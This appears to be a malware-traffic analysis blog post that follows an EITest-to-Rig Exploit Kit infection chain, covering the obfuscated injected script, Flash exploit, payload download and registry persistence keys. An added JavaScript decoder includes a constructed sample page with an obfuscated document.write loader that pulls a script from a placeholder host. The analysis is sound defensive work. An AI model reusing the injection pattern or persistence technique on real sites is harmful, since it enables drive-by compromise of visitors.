Below is a screenshot of the compromised site’s source code containing the injected EITest script:

The script is obfuscated and hex encoded. Calling the replace() method to swap every hyphen for a percent sign undoes the obfuscation and leaves percent-encoded hex data; that data is then decoded with decodeURIComponent() and written into the page with document.write(). This extra layer was likely added to the EITest script to help evade detection.
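The decode chain described above can be reproduced statically, without ever calling document.write(), so the staged content is inspected rather than executed. The following is an added example and not code from the original post; it runs under Node.js, the HTML sample is constructed, and the placeholder host example.invalid is not an indicator from this case.

```javascript
// Added example (not from the original post): static decoder for the hyphen-for-percent
// hex obfuscation described above. Decodes the literal instead of executing it.

// A literal of the form "-3C-73-63..." (each byte hex-encoded, '%' swapped for '-').
const HYPHEN_HEX = /^(?:-[0-9A-Fa-f]{2})+$/;

// Reverse the obfuscation: "-3C-73..." -> "%3C%73..." -> decoded text.
// Returns null when the literal is not in the expected form or is not valid percent-encoding.
function decodeHyphenHex(literal) {
  if (!HYPHEN_HEX.test(literal)) return null;
  try {
    return decodeURIComponent(literal.replace(/-/g, "%"));
  } catch (e) {
    return null; // URIError: e.g. bytes that do not form valid UTF-8
  }
}

// Scan page source for quoted hyphen-hex literals inside <script> blocks and decode each one.
function extractStagedContent(html) {
  const results = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const literalRe = /["']((?:-[0-9A-Fa-f]{2}){4,})["']/g;
  let block;
  while ((block = scriptRe.exec(html)) !== null) {
    let lit;
    while ((lit = literalRe.exec(block[1])) !== null) {
      const decoded = decodeHyphenHex(lit[1]);
      if (decoded !== null) results.push(decoded);
    }
  }
  return results;
}

// Pull URLs out of decoded content so the next-stage location can be reviewed and blocked.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Constructed sample page (not the real compromised site). The literal decodes to
// <script src="http://example.invalid/s.js"></script> with a placeholder host.
const SAMPLE_HTML = `<html><body><p>hello</p>
<script>var d="-3C-73-63-72-69-70-74-20-73-72-63-3D-22-68-74-74-70-3A-2F-2F-65-78-61-6D-70-6C-65-2E-69-6E-76-61-6C-69-64-2F-73-2E-6A-73-22-3E-3C-2F-73-63-72-69-70-74-3E";
document.write(decodeURIComponent(d.replace(/-/g,"%")));</script>
</body></html>`;

for (const staged of extractStagedContent(SAMPLE_HTML)) {
  console.log("decoded:", staged);
  console.log("urls:", extractUrls(staged));
}
```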

The purpose of the EITest script is to give the host instructions to download the EITest Flash file. Here is the GET request for that Flash file:

After the EITest Flash file is delivered, the host is redirected to the EITest gate:

If you look at the <script> tag you will notice an href containing the URL of the Rig Exploit Kit landing page. As you might expect, the host then makes a GET request for the Rig Exploit Kit landing page (shown below):

The file returned to the host is obfuscated and encoded. As always, once on the landing page the host is given instructions to request an exploit. No surprise here: it was a Flash exploit:

After the Flash exploit is sent to the host we see the request for the payload:

The response from the server shows the content-type to be application/x-msdownload and the content-length to be 373248 bytes. That equates to 364.5 KB. Next, we see an executable created in the user’s %TEMP% folder called “575y93oe5wa_1.exe”. That executable is 364.5 KB in size. I am not sure yet what this payload is, but the POST requests to gate.php make me think it could be Hancitor downloader callback traffic.

There were also 3 registry keys created with the name “CreativeAudio” and the data value “C:\ProgramData\CreativeAudio\575y93oe5wa.exe”. The keys were in Run and RunOnce, shown below:

Following the payload delivered by the Rig Exploit Kit server there were two GET requests for an executable named “rd927.exe,” 141312 bytes in size (138 KB). Below is a GET request for that executable with the response showing “MZ” and “This program cannot be run in DOS mode”:

These two files were dropped in the user’s %TEMP% folder and were promptly self-deleted. The names of the files can be seen below:

Once the computer is restarted the payload is removed from %TEMP%. The two registry RunOnce keys remain the same; however, the Run key under HKEY_CURRENT_USER pointing to C:\ProgramData\CreativeAudio\575y93oe5wa.exe is now gone.

As always I recommend blocking all the IPs listed in the IOCs section at the very top of this post.